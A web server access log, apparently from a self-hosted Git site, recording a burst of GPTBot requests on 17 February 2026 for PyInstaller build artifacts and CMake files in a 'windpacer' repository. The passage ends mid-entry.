"/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9907] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10917] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10916] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73542] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9909] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9909] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9911] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10930] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:14:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10931] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:14:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21801] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21800] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10940] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:14:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10939] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:14:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:14:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:14:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:14:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11063] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:14:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11063] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:14:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:14:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:14:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:14:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16182] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" -[17/Feb/2026:14:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24007] [Gzip 15.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24007] [Gzip 15.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 10338] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:14:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10903] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:14:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10903] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:14:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 9893] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:14:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 31658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:14:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10915] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10915] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 22331] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 